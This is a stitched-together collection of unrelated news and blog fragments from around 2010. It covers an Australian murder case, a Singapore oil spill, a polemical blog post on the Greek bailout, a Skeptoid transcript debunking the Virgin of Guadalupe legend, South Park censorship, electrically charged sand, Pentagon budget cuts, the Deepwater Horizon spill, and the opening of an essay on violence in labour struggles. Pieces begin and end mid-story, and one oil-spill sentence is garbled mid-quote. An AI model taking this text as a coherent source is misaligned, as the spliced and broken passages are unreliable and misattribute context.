' Life is full of s*** sometimes , ' he wrote earlier this month .
In April he wrote that ' a broken heart will heal in time but some wounds wo n't ' .
Nona Belomesoff's grief - stricken mother , Nina , said through her tears today : ' She was scared she was going to lose the job she really likes , so she went - and never came back . '
Her brother Gary , warning young people not to trust strangers they meet over the internet , told Sydney 's Channel Seven News : ' I can't believe such a human being would do this .
It 's so cold hearted .
' Be careful - you ca n't just trust anybody over the internet . '
Dannevig , who appeared before Parramatta Court , west of Sydney , via a video link from prison at the weekend , has been remanded in custody and will appear in court again on Thursday .
Emergency teams are working to contain a crude oil spill after two ships - a tanker and a bulk carrier - collided in waters off Singapore .
Port officials said no injuries had been reported but the Malaysian - registered tanker had ruptured one of its tanks .
An estimated 2,000 tonnes of crude oil are leaking into the sea .
The collision happened in the Strait of Singapore , one of the most important shipping lanes in the world .
Singapore 's Maritime and Port Authority ( MPA ) said the Malaysian - registered tanker Bunga Kelana 3 was damaged in a collision with the MV Wally , registered in St Vincent and the Grenadines .
The Bunga Kelana 3 was carrying light crude oil and condensate .
" The collision caused a 10 - metre ( yard ) tear in the left side of the tanker and 2,000 metric tonnes of crude oil has spilled into the sea where the collision occurred , " Cmdr Abdul Hadib bin Abdul Wahab of the Malaysian Coastguard told Reuters .
Both ships are anchored off Singapore as work continues to contain and clean up the oil spill .
The Malaysia - based operators of the tanker , AET , said booms were being placed around the vessel to contain the spill .
Salvage operators said the oil could damage the local environment but that the speed of the response had reduced the impact .
" I think it can be controlled - 2,00 r who asked not to be named told the AFP news agency .
There was no reported effect on shipping traffic in the Strait of Singapore , one of the world 's busiest sea lanes , connecting trade routes from Asia to Africa and Europe .
The E.C.B. -I.M.F. bailout being compared to TARP and the fall of the Greek ’s government ’s solvency capacity ’s parallels to the domino fall that became the Great Depression .
10 May 2010 | InfoShop News
The European Central Bank and International Monetary Fund ( I.M.F. ) have committed € 750bn ( ~$ 963 bn ) to bail out the Greek government and its vulture banksters .
R.A. details at his Economist blog :
The plan consists of several parts .
Euro zone nations agreed to the creation of a special entity that can raise up to € 440 b by issuing debt , which will be guaranteed by European governments .
That money could then be lent out to countries struggling with debt ( who would not be a part of the system of guarantees ) .
The I.M.F. chipped in an additional € 250b , and the European Union — including , interestingly , the E.U. governments not a part of the euro zone — has ponied up € 60b , from the E.U. budget , which can be used immediately .
The U.S. government commits to supplying 20 % of I.M.F. funding .
Initially , it looked as if the U.S. bill would be $ 8 bn — under the initial ~ $ 150 bn bailout plan — but the I.M.F. ’s share demands $ 64,185,000 from the U.S. government to print out of thin air and hand over to the global poli-financial class .
The banksters are setting up Portugal and Spain ’s toxic governments for a similar downfall , R.A. continues :
Meanwhile , the Federal Reserve re-opened currency swap lines it established during the crisis of 2008 .
And the Spanish and Portuguese governments are putting together plans to trim their deficits .
These lines were “ wound down ” in February , but re-opening them is set to swap up to $ 30bn with the Bank of Canada through January 2011 , Jeannine Aversa reported at the Associated Press , adding :
Figures were n’t provided for the other central banks … .
The Fed ’s balance sheet ballooned to $ 2.3 trillion , more than double where it stood before the crisis struck .
The program reopened on Sunday will expand the Fed ’s balance sheet , economists say .
She reports these economists add that the “ program poses little credit risk to the Fed because the arrangements are with other central banks ” , but Neil Barofsky , inspector general of the Troubled Asset Relief Program [ TARP ] , said the 2008 bailout with the swaps that followed added $ 23.7 bn in taxpayer risk to the financial system .
These were n’t arrangements directly between central banks , but with Wall Street as intermediaries in many indirect deals between the Federal Reserve and other central banks .
There is little argument against Mr. Barofsky ’s audit and it should be noted this was in July 2009 , six - to - seven months before the swaps “ wound down ” .
The Euro Question
The value of the euro will be volatile for a while .
No matter how Wall Street takes the swings , the short - term up ’s and downs should n’t be taken too seriously and the strength of the U.S. dollar will be distorted as the euro continues a downfall .
Swapping within the market will see short - term surges — like today across Europe and in the U.S. — that will tell nothing other than surging confidence in financial institutions to pass their liabilities onto to the global plantation .
The euro had an intra-day surge , but ended where it began the day , Vincent Fernando posted at Business Insider ( B.I. ) .
These patterns will continue , but be more drawn out over days and weeks .
The overall trend will continue over 2- , 3 - , 5 - and 10 - year spreads , but more along the pace of the U.S. in relation to gold .
Joe Weisenthal posted “ what it looks like when a market gives up on a currency ” at B.I. last week :
The Dollar Question
If there ’s one lifeboat for the U.S. dollar , it ’s a massive inflation of the euro .
I ’d call it a stay of execution .
All in all , inflationary effects from participation in the Greece bailout wo n’t be much of a factor as the dollar will look good for some years against the euro , according to the Deutsche Bank chief economist Thomas Mayer — and there ’s little reason to disagree .
The direct effects will be more international Wall Street gambling that the Federal reserve will eventually bailout for more trillions .
This is n’t a bailout of the Greek people ’s so - called ‘ welfare state ’ , the government ’s unfunded liabilities to veterans and teachers and such .
This is a bailout of the “ shadow banking system ” , Ezra Klein points out at his Washington Post blog , and the propaganda machines throughout Europe are doing a very good job of concealing this :
Remember that this is no more a bailout of Greece and Spain and Portugal than TARP was a bailout of subprime borrowers … .
Rather , this is a bailout of the European banking system ( and possibly some international banks ) , much like TARP was a bailout of our banking systems ( and some international banks ) .
The way people understand the European crisis is that a few countries hold much too much debt .
But you can flip that around , too : Many banks loaned a few countries much too much money .
And if those banks do n’t get paid back , they ’re going to go insolvent , and the banking system is going to freeze .
Intra-European resentment is probably going to protect the banks from becoming the villains here ( Germans would prefer to blame the Greeks than Deutsche Bank ) , but they ’re a big part of the story .
Note The New York Times ‘ report on the market ’s reaction the bailout : “ European banks were the early winners .
In France , BNP Paribas soared 14 percent and Credit Agricole rose 16 percent ; Germany ’s largest bank , Deutsche Bank , gained 10 percent . ”
As much hysteria ’s been made regarding Greece — and it is a catastrophe — the government ’s assets - liability ratio in better shape than the average household in the U.S. , Canada and Japan , Robert Samuelson points out in a doomsday article at Newsweek .
He lines up the Greece failure with events that preceded the Great Depression , but almost blames the gold standard to equate it with today ’s welfare state .
The China Question
The common thread , if there is one to take from this article , is n’t the gold standard , but the centralization of a global economy to a falling empire .
Reading it in this context , there ’s a lot to take from his article .
It ’s a more realist look at the geopolitical climate emerging in the East as the U.S. began to expand its sphere of influence after World War I .
The I.M.F. and World Bank have unsuccessfully colluded to prevent this , as I wrote during their October meetings :
At the Pittsburgh G - 20 Summit less than two weeks ago , the Anglo - American call to the I.M.F. was for it to implement policies to force down the exchange rate of China ’s currency ( the renminbi ) to save their own , [ Krishna Guha ] reported after the Summit .
With Chris Giles , he followed up on his report that the G - 20 was “ unable to agree ” on a currency agreement at the Summit , I.M.F.
Managing Director Dominique Strauss - Kahn “ reiterated his criticism of China ’s ‘ undervalued ’ currency … [ T ]he U.S. and Europe believe the renminbi needs to appreciate to help reduce China ’s still large trade surplus . ”
The World Bank and I.M.F. are being used by the Anglo - American factions to forcefully prevent the implosion of the intrinsically worthless greenback and euro .
Nothing of relieving the odious debt inflicted upon Western workers and the Third World .
Only the preservation of the “ Euro - Atlantic ” financial oligarchy over us .
If we see the Third World — and developing countries — go to East Asia and the Middle East for solvency , away from the I.M.F. and World Bank , these currencies will actually strengthen in a de facto debt transfer .
A basic truism in geopolitics is that “ balancing behavior tends to predominate in international politics , but that especially weak and / or isolated states were somewhat more likely to bandwagon than strong states are ” , Professor Stephen Walt noted at his Foreign Policy Magazine blog last week .
“ Because weak states can do little to affect the outcome of a contest and may suffer grievously in the process , they must choose the side that is likely to win .
And where great powers tend to have global interests , weak states worry mostly about the balance of power in their immediate region .
They may be willing to stand up to a stronger power if they are assured of ample allied support , but a weak state left to its own devices may have little choice but to kowtow to a larger and stronger neighbor .
That is how ‘ spheres of influence ’ are born . ”
It is n’t a coincidence that the U.S. is focusing on military partnerships in Colombia , Brazil , Afghanistan and Pakistan ; protecting unlawful , covert nuclear proliferation in India and Israel ( of course ) ; and President Barack Obama recently nominated a top former government intelligence specialist on Iran to head intelligence at the Treasury Department .
Understanding the facts — which are , of course , contrary to any narrative suggesting this bailout is for the welfare of the Greek people , global economic stability in people ’s daily lives — that this is a de jure bankster bailout , here are the takes that seem valid to interpret the geopolitical theater :
The Anglo - American institutions colluded to create parity among the U.S. dollar and euro , unable to reach a deal with China to overprice the renminbi ; or The European Central Bank is playing on the false sense of security in the euro because of the U.S. bailing out Wall Street for up to $ 23.7bn in U.S. dollars .
Both seem to be the dominant driving forces behind the nation - state authorities in control of international banking institutions to further prop up the “ shadow banking system ” , Mr. Klein quoted earlier , in short term as the E.U. and U.S. continue to make failing attempts at convincing China to undervalue its productive capacity .
“ China appears to be doing something akin to what we did during the latter part of the 19th century , ” Prof .
Walt noted late last month .
“ To be specific : Beijing is seeking to build its economy , then expand its military capacity , achieve a position of regional dominance , and then exclude other major powers from its immediate neighborhood . ”
More than any other question I casually is what I ’ve just called ‘ The China Question ’ : Is China the next superpower and when should we see this ?
My answer for about the last three years has been similar to the analysis of Prof .
Walt’s :
I ‘d expect China to speak softly ( for the most part ) while it builds a bigger stick .
If they are smart , they wo n’t throw their weight around too much lest they provoke more vigorous balancing behavior by their neighbors ( and the United States ) .
I would also expect them to continuing developing military capabilities designed to make it more dangerous for the United States to operate near China , and eventually build power projection capabilities that will complicate our operations in other areas that matter ( like the Persian Gulf ) .
At the same time , look for them to forge relations in some areas that have been traditional U.S. “ spheres of interest , ” so that the United States has to devote more time and attention to these regions too .
I ’d expect them to play “ divide - and - conquer ” closer to home as well , and try to persuade some of their neighbors to distance themselves from Washington .
Lastly , Beijing would dearly love to keep the United States bogged down in places like Afghanistan , distracted by disputes over Iran ’s nuclear program , and stymied by the interminable Israeli - Palestinian conflict , while they exploit the anti-American sentiments that these problems exacerbate and stay focused on the bigger picture .
EDIT : Today , Prof .
Walt points out at his blog that the “ larger problem is longer - term ” for the European Union :
In any case , whether Europe grows closer together or begins to spin apart , it ’s going to carry a lot less weight in world affairs in the next few decades .
Its population is shrinking and aging , its military power is increasingly hollow , and it ’s going to be short on money for years to come .
If U.S. officials think they are going to get a lot more help from NATO in the decades to come , they are living in a dream world .
EDIT2 : “ The Pragmatic Capitalist ” has a rather vulgar analysis ( h/t : B.I. ) that should n’t distract one from a thesis somewhat consistent with mine that is sadly suppressed in the dominant narrative — that “ market participants are keenly focused on the solvency issue here when in fact , this is a currency crisis ” and the former “ is a byproduct of the failures ” of the latter .
He adds :
The ECB is no longer independent and no longer responsible for price stability .
Even with rumors of sterilization , with their bond purchases I believe they have crossed a line .
Without their knowing it , they have all but admitted that the Euro is a failed currency experiment and have resorted to “ last ditch ” efforts to save it ….
The Euro is broken .
Single currency systems do not work and they must be killed .
In the long - term , it is in the best interest of all involved .
If the politicians in Europe are wise they will begin working on real structural reforms now that they have bought themselves some time .
Unfortunately , I do n’t think they recognize that this is a currency crisis and that ’s why the risks in the market remain abnormally elevated .
EDIT3 : At True Slant , Allison Kilkenny spoke to University of Athens Professor Yanis Varoufakis and does a great job of dispelling the scapegoat myth dominating the “ vicious foreign media campaign depicting Greeks as lazy , corrupt , and ‘ living the good life ' ” .
It is only “ partly true ” , as Prof. Varoufakis notes [ emphasis hers ] :
If you go around the posh parts of Athens , you see a great deal of wealth .
Its no difference between the wealth you ’ll encounter here to what you ’d see in Paris , Los Angeles , in London .
You go to the poor areas , and we have third world country - like conditions .
You have teachers , who teach in remote villages for the equivalent of $ 800 USD a month in a country where prices are sky high .
And now , what we have is a situation where the government is asking of that teacher to lose 10 percent of his or her wages as a contribution to the overcoming of the crisis .
While all along , the people driving their Porsches and their Mercedes Benz in the city center of Athens , will be paying very little simply because they are quite adept at not paying taxes at all .
She adds that “ teachers are now being asked to cut their lavish $ 800 / month paychecks in the spirit of bailing out Greece ” and international banksters .
Odd is she ignores the currency crisis at the root while informing the eurozone nation - states have “ adopted the euro currency as their sole legal tender ” yet the “ burden of individual nations is hardly fairly shared ” and the professor notes the intra-manufacturing of masters and slaves — that “ my deficit is your surplus , and vice - versa ” in the eurozone .
Worse , she tailspins into Keynesian voodonomics , but I would n’t hold that against her aritcle .
It simply explains why the trickle - up destruction of currency manipulation is passed over in the analysis .
A common comparison is of Greece to California .
This is n’t terribly inaccurate , but it ’s more honest to describe Greece , California , the U.S. and the eurozone as microcosms of the global economy .
Without this , the others ’ ignorance of vital trends make myself extremely misunderstood as a determinist .
I ’m actually expressing that continued ignorance — on behalf of soi-disant progressives and conservatives — as to the dangers of money monopoly and being stronger proponents of attempting to strengthen monopoly are self - defeating and will be the root cause of painful currency collapses in the West .
Do n't know what a license plate means ?
Search for it on Urban Dictionary
Mexico's Virgin of Guadalupe played an important role in the Catholic colonization of the Americas .
by Brian Dunning
Filed under Ancient Mysteries , Religion
Skeptoid Podcast # 201
April 13 , 2010
Podcast transcript | Subscribe
Listen :
https://skeptoid.com/audio/skeptoid-4201.mp3
The Virgin of Guadalupe
( Public Domain image )
Today we 're going to travel back to the time of the Conquistadors , when Spanish soldiers marched through Aztec jungles and spread Catholicism to the New World .
We 're going to examine an object that is central to faith in Mexico :
An image called the Virgin of Guadalupe .
The Virgin of Guadalupe is basically Mexico 's version of the Shroud of Turin .
Both are pieces of fabric , hundreds of years old , on which appears an image said to be miraculous .
Both are considered sacred objects .
But the Virgin of Guadalupe is a much more powerful icon to many Mexicans .
There 's hardly anywhere you can go in Mexico and not find a reproduction of the image .
Its importance as a religious and cultural symbol cannot be understated , for it came from the very hands of The Most Holy Virgin Mary , Our Lady of Guadalupe , Queen of Mexico and Empress of the Americas .
A legend well known in Mexico tells how it came to be .
In 1531 , the Spanish had been occupying Mexico for about ten years .
An indigenous peasant , Juan Diego , was walking in what 's now Mexico City when he saw the glowing figure of a teenage girl on a hill called Tepeyac .
She identified herself as the Virgin Mary , and asked him to build her a church on that spot .
Diego recounted this to the Archbishop of Mexico , Juan de Zumárraga ( 1468-1548 ) .
Zumárraga was skeptical and told Diego to return and ask her to prove her identity with a miracle .
Diego did return , and encountered the apparition again .
She told him to climb to the top of the hill and pick some flowers to present to the Bishop .
Although it was winter and no flowers should have been in bloom , Juan Diego found an abundance of flowers of a type he'd never seen before .
The Virgin Mary bundled the flowers into Diego 's cloak , woven from common cactus fiber and called a tilma .
When Juan Diego presented the tilma to Zumárraga , the flowers fell out and he recognized them as Castilian roses , not found in Mexico ; but more significantly , the tilma had been miraculously imprinted with a colorful image of the Virgin herself .
This actual tilma , preserved since that date and showing the familiar image of the Virgin Mary with her head bowed and hands together in prayer , is the Virgin of Guadalupe .
It remains perhaps the most sacred object in all of Mexico .
The story is best known from a manuscript written in the Aztecs ' native language Nahuatl by the scholar Antonio Valeriano ( 1531 -1605 ) , the Nican Mopohua .
By the European watermark on its paper , it 's known to have been written sometime after 1556 .
This was widely published in a larger collection in 1649 by the lawyer Luis Laso de la Vega .
Zumárraga and Juan Diego were both dead by the time Valeriano wrote it , so where did he get his information ?
A red flag that a number of historians have put forth is that Bishop Zumárraga was a prolific writer .
Yet , in not a single one of his known letters , is there any mention of Juan Diego , his miraculous apparition , the roses , or the cloak bearing the image , or any other element of the story in which Zumárraga was alleged to have played so prominent a role .
Not everyone agrees .
In the 2000 book in Spanish , Juan Diego , una Vida de Santidad que Marcó la Historia ( A Life of Holiness that Made History ) , author Eduardo Chavez Sánchez gives , at some length , various quotations from letters by Zumárraga that he believes confirms the Juan Diego narrative .
I found his list to be extraordinarily unconvincing , and I would honestly describe it as really desperate scraping of the bottom of the barrel to find a quote - minable quote .
In fact , the only quote from Zumárraga I found that was remotely close was :
An Indian goes to Brother Toribio and all will be in praise of God .
That sounds great because he mentions an Indian talking to a Catholic figure , but there 's no mention of this Indian 's name , no mention in the Juan Diego stories of a Brother Toribio ( that I could find ) , and no elements of the Juan Diego story included in this single - sentence snippet .
So unless some more of Zumárraga 's writings come to light , I 'm going to agree with the historians who say Zumárraga wrote nothing of these events , which casts doubt on his role in something that would have been of such great importance to him .
The name Juan Diego itself suggests that the story was a fictional invention .
It basically translates as John Doe , a generic everyman , whose identity is unimportant .
This does n't prove anything , since there certainly were real people named Juan Diego , but it is an intriguing element .
It is the actual image of Mary itself that tells us the most about its true history .
As every schoolchild knows , Hernán Cortés ( 1485 - 1547 ) was the Spanish Conquistador who overthrew the Aztec empire and placed much of Mexico under Spanish control in 1521 .
He was born in a region of Spain called Extremadura , and grew up to revere Our Lady of Guadalupe , a statue of a black version of the Virgin Mary , at the Santa María de Guadalupe monastery in Extremadura .
This statue is credited with miraculously helping to expel the Moors from Spain in the Reconquista .
Cortés brought reproductions of this European image of Mary with him when he went to the New World .
Her dark skin resembled the Aztecs , and she became the perfect icon for the missionaries who followed Cortés to rally the natives into Christianity .
One such missionary was Fray Pedro de Gante ( 1480 - 1572 ) , a Franciscan friar from Belgium ( born Pieter van der Moere ) who learned the Aztec language and created the first European - style school in Mexico , San Jose de los Naturales .
One of his promising art students was a young Aztec man with the Christian name Marcos Cipac de Aquino , one of three known prolific Aztec artists of the period .
In 1555 , the newly arrived Archbishop of Mexico , Alonso de Montúfar ( 1489 - 1572 ) , successor to the deceased Zumárraga , was looking to commission a portrait of the Virgin Mary , as a sort of teaching aide to help convert the Aztecs .
Montúfar found the young artist Marcos at de Gante 's school .
And so , in 1555 , the Aztec artist Marcos Cipac de Aquino painted a portrait of the Virgin Mary , with dark skin , with head slightly bowed and hands together in prayer , on a common cactus - fiber canvas .
The painting was named the Virgin of Guadalupe according to the tradition Cortés brought from Spain .
Although the Extremadura statue was not in this pose , the pose was still one of European tradition .
The most often cited example of Mary in this exact pose is the painting A Lady of Mercy , attributed to Bonanat Zaortiga and on display at the National Art Museum of Catalunya , painted in the 1430's .
Marcos followed more than a century of European tradition .
There was a pragmatic element to Montúfar 's introduction of this painting and allowing it to be worshipped .
Before the Conquistadors , Tepeyac was home to an Aztec temple , built to honor the Aztecs ' own virgin goddess , Tonantzin .
So rather than replacing the Aztec goddess , Montúfar 's plan was simply to introduce Mary by giving Tonantzin a name and a face ( recall that Marcos had painted the Virgin with dark skin ) .
This process of using an existing belief system to graft on a new one has been called syncretism .
Understandably , this exploitation of a pagan idol caused discomfort among some of the Franciscans , while many of the Dominicans welcomed the way it helped baptize 8,000,000 Aztecs .
The primary corroborating documentation of Marcos ' painting is a report from the Church in 1556 , when this growing disagreement between the Franciscans and the Dominicans prompted an investigation into the origins of the tilma .
Two of the Franciscans submitted sworn statements in which they expressed their concern that worshipping the tilma was leading the Aztecs to return to their traditional pagan ways .
One described the image as " a painting that the Indian painter Marcos had done " while another said it was " painted yesteryear by an Indian " .
Appearing on the side of the Dominicans , who favored allowing the Aztecs to worship the image , was Bishop Montúfar himself .
As a result , the construction of a much larger church was authorized at Tepeyac , in which the tilma was mounted and displayed .
Significantly , the 1556 report is the most extensive documentation concerning the Virgin tilma of its century , and it makes no mention whatsoever of Juan Diego , the miraculous appearance of the image , or any other element from the legend .
If the miracle story did exist at that time , it seems inconceivable that it could have been omitted from this report .
This strongly supports the suggestion that the Juan Diego legend had not yet been conceived .
It also supports that Valeriano 's Nican Mopohua was written later .
The legend did get its first boost of testable evidence in 1995 , which ( in a case of suspiciously fortuitous timing ) was after Juan Diego 's beatification in 1990 , while there was still debate over whether he should be canonized ( he ultimately was , in 2002 ) .
A Spanish Jesuit named Javier Escalada produced a deerskin which pictorially depicted the Juan Diego legend and has become known as the Codex Escalada .
The Codex also mentioned several historical people , and even bore the signature of a Franciscan historian , Bernardino de Sahagún ( 1499 - 1590 ) , dated 1548 .
Basically , it was the Perfect Storm of tailor - made evidence proving that the Juan Diego legend was the accepted history at the time .
A little too tailor made though ; no serious historians have supported its authenticity .
The best analysis I 've found is by Alberto Peralta of the Proyecto Guadalupe project .
Based on its dubious unveiling , numerous inconsistencies , and other factors , Peralta concludes that it 's impossible for the document to be authentic .
If the Virgin tilma is indeed a painting , and not a miraculously produced image , then it should be a simple matter to determine that scientifically .
There are obvious signs that are hard to argue with , notably that the paint is flaking along a vertical seam in the fabric .
But a truly scientific examination involving sampling of the material has not been permitted .
The most notable examination was a three hour infrared photographic session by Philip Callahan in 1981 , who did note multiple layers of paint covering changes to the hands and crown , but came away with more questions than answers .
Callahan found , for example , that most of the entire painting seemed to have been done with a single brush stroke .
He recommended a series of more tests , but the only one allowed by the Church was a spectrophotometric examination done by Donald Lynn from the Jet Propulsion Laboratory .
The only result released of his examination was that " nothing unusual " was found .
Much has been made of the claim that figures can be seen reflected in Mary 's eyes , with some even identifying these figures as Zumárraga or Juan Diego or other characters from the legend .
The Church even went so far in 1956 as to have two ophthalmologists examine the eyes under 2500 × magnification .
They reported a whole group of figures , including both Aztecs and Franciscans .
Why ophthalmologists should be better qualified to identify Aztecs and Franciscans in random blobs of pigment has not been convincingly argued .
Photos taken by another ophthalmologist in 1979 have been released , and it 's quite obvious that it 's simply random noise .
I see a dozen or so speckles ; if you want to make them into Aztecs , Franciscans , bananas , or Bozo the Clown , then you 'll probably also be great at spotting dozens of Bigfoots hiding in any given photograph of a forest .
The Virgin of Guadalupe is yet more one mythical story whose believers are missing out on true facts that are actually more respectful and confer more credit upon them than the myth .
The image on the Virgin tilma was painted by a native Aztec artist ; and the painting had not only an important role in Mexico 's early history as a nation , but also a staggering impact upon its culture ever since .
Mexicans with Aztec heritage should take pride in the fact that their original culture , specifically the goddess Tonantzin , was a key ingredient in the spread of modern Catholicism .
The Juan Diego myth takes that away , and whitewashes part of Mexican history clean of any Aztec influence .
That 's a disservice to one of humanity 's greatest ancient civilizations , and it's a disservice to history .
When we see the Virgin of Guadalupe image today , most people react in one of two ways :
They worship it as a miraculous apparition , or they dismiss it as someone else 's religious icon .
Both reactions miss the much richer true history .
The Virgin of Guadalupe stands not only as an invaluable work of ancient art ( possibly the most popular piece of art ever created ) , but also as a reminder of how the conquest of Mexico was truly accomplished :
Not only its military conquest , but one of history 's greatest religious conversions as well .
By Brian Dunning
Follow @BrianDunning
SouthParkStudios.com
An episode of “ South Park ” that continued a story line involving the Prophet Muhammad was shown Wednesday night on Comedy Central with audio bleeps and image blocks reading “ CENSORED ” after a Muslim group warned the show ’s creators that they could face violence for depicting that holy Islamic prophet .
Revolution Muslim , a group based in New York , wrote on its Web site that the “ South Park ” creators Matt Stone and Trey Parker “ will probably wind up like Theo Van Gogh ” for an episode shown last week in which a character said to be the Prophet Muhammad was seen wearing a bear costume .
Mr. Van Gogh was slain in Amsterdam in 2004 after making a film that discussed the abuse of Muslim women in some Islamic societies .
The new episode of “ South Park ” on Wednesday night tried to revisit this character , but with the name and depiction of the character blocked out .
It was unclear how much of the bleeping was Mr. Stone and Mr. Parker ’s decision .
In a message posted on their Web site , SouthParkStudios.com , they wrote that they could not immediately stream the new episode on the site because :
After we delivered the show , and prior to broadcast , Comedy Central placed numerous additional audio bleeps throughout the episode .
We do not have network approval to stream our original version of the show .
On Thursday morning , a spokesman for Comedy Central confirmed that the network had added more bleeps to the episode than were in the cut delivered by South Park Studios , and that it was not giving permission for the episode to run on the studio ’s Web site .
On Thursday afternoon , Trey Parker and Matt Stone released the following statement :
It 's the ultimate love - at - first - sight story :
In the middle of the desert , hundreds of miles from anything else , lonely sand grains meet up in a crowd and decide to electrify each other .
Sparks fly .
[ partner id =" sciencenews " align = " right " ]
Physicists have long puzzled over why sand grains and other small particles can build up electrical charges as they collide with one another , sometimes to the point of discharging lightning in dust storms or plumes of volcanic ash .
Now , a paper in an upcoming issue of Nature Physics suggests that particles transfer electrical charge vertically during a smashup , such that positive charges move downward and negative charges move up in the cloud .
The findings could help combat a wide variety of practical problems , such as the adhesion of charged dust to solar panels on a Mars rover or the generation of dangerous electrical discharges that sometimes occur when a helicopter takes off in the desert .
Dust clouds can create problems in grain silos , where charge sometimes builds up and leads to explosions , and in the pharmaceutical industry , where particles of ground - up drugs can become charged and not mix properly , says Hans Herrmann , a materials researcher at ETH Zurich .
Herrmann says he became interested in the problem after watching lightning in swirling sands over dune fields at night .
" Normally when particles collide , they neutralize , " he says .
" How could it be that charges increase ? "
Working with ETH colleague Thomas Pähtz and Troy Shinbrot of Rutgers University 's campus in Piscataway , New Jersey , Herrmann developed a model to explain how the charging happened .
Before colliding , the grains have an overall neutral charge but are polarized by a background electric field , with a negative charge toward the top of the grain and a positive charge toward the bottom , relative to the ground .
Upon colliding , the particles neutralize each other at the point of contact , but when they separate again they became further polarized , with additional charges building up on the grains ' edges .
" Every time there 's a collision you end up pumping charge from the top to the bottom , " says Shinbrot .
The researchers ran computer simulations and then a series of experiments with glass beads to confirm the theory .
Daniel Lacks , a materials physicist at Case Western Reserve University in Cleveland , says the new study could be identifying one of several mechanisms at work in particle clouds .
In earlier work , Lacks showed that electrical charging depends on the size of particles in question , with smaller particles tending to charge negatively and larger particles tending to charge positively .
" The bottom line is that something is needed to break the symmetry when two particles of identical composition collide , in order for one particle to charge negatively and the other to charge positively , " he says .
For particles of different sizes , he says his mechanism might be in play ; for identically sized particles , the new model might explain it .
Some challenges remain , such as explaining where the background electric field that charges the particles came from .
But Herrmann says the work is philosophically satisfying , in answering a long - held question , and may yet have practical applications .
Image : Oliver Spalt / Wikimedia Commons
First up this week -- and featured on the cover -- are Newsnight 's Paul Mason and our own John Pilger on the unfolding eurozone drama and why what 's happening in Greece today , will hit Britain tomorrow .
Elsewhere , we examine the fallout from the general election : Mehdi Hasan wages war on the defeatism within the Labour Party while our political correspondent , James Macintyre , tells the inside story of the failed Lib Dem - Labour talks .
Meanwhile , in Commons Confidential , Kevin Maguire shares news of David Cameron 's " Operation De- Toff " .
In The Critics , Ryan Gilbey salutes the darkly eccentric Bad Lieutenant , starring Nicolas Cage , while Rachel Cooke indulges in some Eighties nostalgia in the Boy George biopic Worried About the Boy .
Finally , on the day Diane Abbott and Andy Burnham joined the race , do n't forget to keep up to date on all things Labour leadership on newstatesman.com .
The issue is on sale now , or you can subscribe via the website .
ABILENE , Kansas ( Reuters ) - Defense Secretary Robert Gates told the U.S. military on Saturday it must rein in spending that he called out of sync with today ’s tough economic times , and said budget woes could be a factor in deciding whether to use force against Iran and others .
Defense Secretary Robert Gates discusses changes to the Pentagon 's " Do n't Ask , Don't Tell " policy prohibiting homosexuals from serving openly in the U.S. military during a media briefing in the Pentagon Briefing Room in Washington , March 25 , 2010 .
REUTERS / Hyungwon Kang
Promising to play a hands - on role in wringing out savings , Gates held out the possibility of axing headquarters , merging whole agencies and culling the officer corps , taking on entrenched interests sure to put up a fight .
Sticker shock from wars in Afghanistan and Iraq also mean President Barack Obama and Congress may be more cautious about committing U.S. forces to another costly military engagement , he said .
“ I do think that as we look to the future , particularly for the next couple of years or so while we ’re in Iraq and Afghanistan , I think the Congress and the president would look long and hard at another military operation that would cost us $ 100 billion a year , ” Gates told reporters .
“ If there ’s a real threat out there , the president and Congress will spend whatever it takes to protect the nation .
But in situations where there are real choices , I think this would be a factor , ” he added .
Asked if Iran fell into the category where costs would be a factor in deciding whether to strike over its nuclear program , Gates said it was unclear .
“ It depends on developments over the next year or two , ” he said .
Gates said his goal was to cut overhead in the Defense Department ’s nearly $ 550 billion baseline budget between two to three percent , or $ 10 billion to $ 15 billion per year , starting in fiscal 2012 .
The savings would allow the Pentagon to sustain force levels and free up funds for modernization programs .
Without such savings , Gates said , “ it is highly unlikely that we will achieve the real growth rates necessary to sustain the current force structure . ”
The budget warning was widely seen as part of stepped up efforts by Gates to define his legacy as Pentagon chief .
The venue Gates chose to deliver his message was the presidential library of Dwight D. Eisenhower , who warned about a “ military - industrial complex ” in a January 17 , 1961 , farewell speech .
‘ ROOT -AND - BRANCH ’ CHANGES
High unemployment and a record $ 1.4 trillion budget deficit are among the toughest domestic challenges Obama faces and could dim prospects for his Democratic Party in congressional elections in November .
Gates said the military spending “ gusher ” sparked by the September 11 , 2001 attacks on the United States “ has been turned off . ”
He cited America ’s “ difficult economic circumstances and parlous fiscal condition . ”
Gates ’s call for “ root - and - branch ” changes and his questioning of whether the current number of headquarters , flag - officers and commands were necessary could trigger a struggle with groups that have major clout in Congress .
Jacques Gansler , who served as the Pentagon ’s chief weapons buyer from 1997 until 2001 , said Gates ’ biggest hurdle may be winning over members of Congress who are liable to say : “ ‘ We all want to make savings but not in my district . ’ ”
Gansler said the secretary ’s goal of saving 3 percent was doable through efficiencies such as greater competition for contracts , streamlining computer systems and easing requirements that half of all maintenance work on U.S. weapons systems be done at U.S. government depots .
“ We ’ll get this done , ” Gates said , promising to spearhead a review to reduce wasteful spending and slash bureaucratic overhead .
But it is unclear how long Gates will remain in the job to follow through on what he acknowledged would be a “ long - term process . ”
Gates already has angered some vested interests by persuading Congress to cut , kill or limit a number of big - ticket military programs , including Lockheed Martin Corp ’s premier F - 22 fighter .
On Monday , he again questioned the need for a projected $ 13.2 billion landing - craft program for the Marine Corps .
The so - called Expeditionary Fighting Vehicle is to be built by General Dynamics Corp .
In Bootle , one person does not really have one vote , they have the equivalent of 0.010 votes .
The power of voters in this constituency is based on the probability of the seat changing hands and its size .
While you might think that every vote counts equally , where you live in the UK has a huge effect on your power to influence the election .
Deepwater Horizon : BP 's efforts to control the Gulf of Mexico oil spill
Since the Deepwater Horizon oil rig exploded in April 2010 , thousands of barrels of oil a day have been gushing into the seas of the Gulf of Mexico and drifting towards the US coast , threatening wildlife and livelihoods dependent on tourism and fishing .
This graphic explains BP 's attempts to control the oil spill
By Mike Kolhoff
Old Joke :
On Ellis Island , early in the 20th century , an elderly eastern European man is being processed for immigration into the United States .
He stands before the desk of the immigration officer who loudly asks him , without looking up : “ Do you advocate the overthrow of the United States Government by subversion or violence ? ”
The old man mulls it over for a few seconds , then answers : “ VIOLENCE ! ”
What place does violence have in the struggle to overthrow the capitalist system ?
What place does it have in any struggle ?
Is the current definition of violence as accepted by the ruling regime and the loyal opposition relevant or realistic ?
These questions interest me enough to make me want to take a stab ( no pun intended ) at answering them , and a few more , by examining violence in the workers movement in North America .
I want to try to examine violent action from a tactical standpoint , free from the moral preconditions of the religious and pacifist positions .
